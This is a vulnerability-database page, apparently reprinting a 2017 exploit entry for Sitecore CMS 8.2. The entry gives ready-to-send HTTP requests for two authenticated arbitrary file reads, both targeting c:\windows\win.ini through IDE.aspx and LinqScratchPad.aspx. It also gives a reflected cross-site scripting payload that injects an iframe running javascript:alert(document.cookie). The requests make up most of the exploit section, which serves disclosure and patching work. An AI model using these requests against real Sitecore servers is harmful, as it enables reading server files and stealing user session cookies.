Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Sitecore CMS 8.2 - Cross-Site Scripting Arbitrary File Disclosure

🗓️ 05 May 2017 00:00:00Reported by Usman SaeedType 
exploitpack
 exploitpack👁 13 Views

Sitecore CMS 8.2 multiple vulnerabilities - Arbitrary file access and Reflected Cross-site Scriptin

Code
Exploit title: Sitecore CMS v8.2  multiple vulnerabilities
Product: Sitecore
Version: 8.2, Rev: 161221, Date: 21st December, 2016
Date: 05-05-2017
Author: Usman Saeed
Email: [email protected] <%[email protected]>
Vendor Homepage: http://www.sitecore.net/


Disclaimer: Everything mentioned below is for educational puposes. The
vulnerability details are mentioned as is. I would not be held responsible
for any misuse of this information.

Summary:
Multiple vulnerabilities were found in the Sitecore product.  The
vulnerabilities include two instances of arbitrary file access and once
instance of reflected cosssite scripting.

1: Arbitrary file access:

- Description:

The vulnerability lies in the tools which can be accessed via the
administrator user. The vulnerability exists because there is no bound
check for absolute path in the application, that is, if the absolute path
is provided to the vulnerable URL, it reads the path and shows the contents
of the file requested.

- Exploit:
1. Once authenticated as the administrator perform a GET request to the
followiung URL:
/sitecore/shell/Applications/Layouts/IDE.aspx?fi=c:\windows\win.ini

2. Once authenticated as the administrator perform a POST request to the
followiung URL:

POST /sitecore/admin/LinqScratchPad.aspx
HTTP/1.1
Host: <HOST>
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101
 Firefox/53.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Content-Type: application/x-www-form-urlencoded
Content-Length: 1463
Referer: <OMITTED>
Cookie: <OMITTED>
Connection: close
Upgrade-Insecure-Requests: 1

__VIEWSTATE= &__VIEWSTATEGENERATOR=
&__EVENTVALIDATION=&LinqQuery=%0D%0A&Reference=c%3A%5Cwindows%
5Cwin.ini&Fetch=



2. Reflected Cross-site Scripting:
- Description:
The application does not sanatize the USER input which allows a normal
authenticated user to exploit this vulnerability.


- Exploit:

POST /sitecore/shell/Applications/Tools/Run HTTP/1.1
Host: <HOST>
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101
 Firefox/53.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Content-Type: application/x-www-form-urlencoded
Referer:  <OMITTED>
Content-Length: 518
Cookie:  <OMITTED>

&__PARAMETERS=run%3Aok&__EVENTTARGET=&__EVENTARGUMENT=&__SOURCE=&__EVENTTYPE=click&__CONTEXTMENU=&__MODIFIED=1&__ISEVENT=1&__SHIFTKEY=&__CTRLKEY=&__ALTKEY=&__BUTTON=0&__KEYCODE=undefined&__X=1763&__Y=883&__URL=https%3A///sitecore/shell/Applications/Tools/Run&__CSRFTOKEN=
&__VIEWSTATE=&__VIEWSTATE=&Program=%3F%3E%3C%3F%3E%3Ciframe%20src%3D%22Javascript%3Aalert(
document.cookie)%3B%22%3E%3C%2Fiframe%3E

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
05 May 2017 00:00Current
sitecorecms8.2vulnerabilitiesarbitrary file accessreflected cross-site scripting
13